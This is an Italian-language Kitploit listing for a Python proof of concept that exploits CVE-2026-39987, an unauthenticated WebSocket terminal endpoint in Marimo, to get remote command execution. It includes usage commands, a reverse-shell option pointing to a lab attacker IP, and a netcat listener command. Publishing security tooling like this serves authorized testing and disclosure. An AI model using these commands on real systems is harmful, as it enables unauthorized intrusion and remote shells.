Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-39987_RCE_PoC — Proof-of-concept in Python per CVE-2026-39987, che sfrutta un endpoint terminale WebSocket non autenticato per ottenere l'esecuzione remota di comandi e l'accesso a una reverse shell. | Kitploit
Strumenti/GitHubGitHub/mfahdk/cve-2026-39987_rce_poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingStrumento di Accesso Remoto
GitHubmfahdk/cve-2026-39987_rce_poc

CVE-2026-39987_RCE_PoC

Proof-of-concept in Python per CVE-2026-39987, che sfrutta un endpoint terminale WebSocket non autenticato per ottenere l'esecuzione remota di comandi e l'accesso a una reverse shell.

Vedi Repository
9h 21m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-39987 — PoC RCE via WebSocket di Marimo

Proof of Concept per CVE-2026-39987, che dimostra l'esecuzione remota di comandi attraverso l'endpoint terminale WebSocket vulnerabile.

Disclaimer: Questo PoC è destinato esclusivamente a test di sicurezza autorizzati e uso educativo. Utilizzalo solo contro sistemi di tua proprietà o per i quali hai esplicita autorizzazione a testare.

Descrizione

La vulnerabilità consente a un utente non autenticato di interagire con l'endpoint terminale WebSocket dell'applicazione ed eseguire comandi in remoto.

Il PoC si connette a:

root@kitploit:~
wss://<target>/terminal/ws

e dimostra l'esecuzione di comandi attraverso la connessione WebSocket.

Il target utilizzato durante lo sviluppo/testing di questo PoC era un ambiente lab Hack The Box autorizzato.

Requisiti

  • Python 3
  • websocket-client

Installa la libreria richiesta:

root@kitploit:~
pip3 install websocket-client

Utilizzo

root@kitploit:~
python3 test.py <domain>

Esempio:

root@kitploit:~
python3 test.py somesite.com

Il PoC stabilisce la connessione WebSocket ed esegue un comando di test.

Reverse Shell

Il PoC supporta anche un'opzione reverse-shell:

root@kitploit:~
python3 exploit.py <domain> --reverse-shell <IP> --port <PORT>

Esempio:

root@kitploit:~
python3 exploit.py somesite.com --reverse-shell 10.10.14.5 --port 4444

Avvia il listener prima di eseguire il PoC:

root@kitploit:~
nc -lvnp 4444

Dettagli tecnici

L'applicazione espone un endpoint terminale WebSocket senza richiedere autenticazione.

Il PoC:

  1. Stabilisce una connessione WebSocket.
  2. Disabilita la verifica del certificato TLS perché il target del lab utilizza un certificato self-signed.
  3. Consuma il prompt iniziale del terminale.
  4. Invia un comando attraverso il WebSocket.
  5. Legge l'output risultante del terminale.

La ws.recv() iniziale è importante perché il server invia il prompt della shell immediatamente dopo aver stabilito la connessione.

Scarica lo strumento